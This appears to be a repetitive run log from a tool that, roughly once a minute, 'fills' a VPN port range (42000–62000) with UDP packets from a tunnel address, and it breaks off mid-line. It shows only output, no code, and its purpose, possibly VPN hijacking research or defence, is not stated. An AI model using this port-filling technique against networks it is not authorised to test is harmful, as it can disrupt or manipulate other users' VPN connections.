-Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:56:05 -Starting port fill at 2020-09-06 15:57:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:57:04 -Starting port fill at 2020-09-06 15:58:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 15:58:06 -Starting port fill at 2020-09-06 15:59:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 15:59:05 -Starting port fill at 2020-09-06 16:00:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 16:00:06 -Starting port fill at 2020-09-06 16:01:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:01:06 -Starting port fill at 2020-09-06 16:02:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:02:05 -Starting port fill at 2020-09-06 16:03:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:03:04 -Starting port fill at 2020-09-06 16:04:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:04:04 -Starting port fill at 2020-09-06 16:05:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:05:06 -Starting port fill at 2020-09-06 16:06:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:06:05 -Starting port fill at 2020-09-06 16:07:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 16:07:07 -Starting port fill at 2020-09-06 16:08:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:08:06 -Starting port fill at 2020-09-06 16:09:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 16:09:07 -Starting port fill at 2020-09-06 16:10:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:10:05 -Starting port fill at 2020-09-06 16:11:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:11:05 -Starting port fill at 2020-09-06 16:12:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:12:05 -Starting port fill at 2020-09-06 16:13:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:13:05 -Starting port fill at 2020-09-06 16:14:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:14:05 -Starting port fill at 2020-09-06 16:15:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:15:05 -Starting port fill at 2020-09-06 16:16:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:16:04 -Starting port fill at 2020-09-06 16:17:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:17:04 -Starting port fill at 2020-09-06 16:18:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:18:05 -Starting port fill at 2020-09-06 16:19:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:19:05 -Starting port fill at 2020-09-06 16:20:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 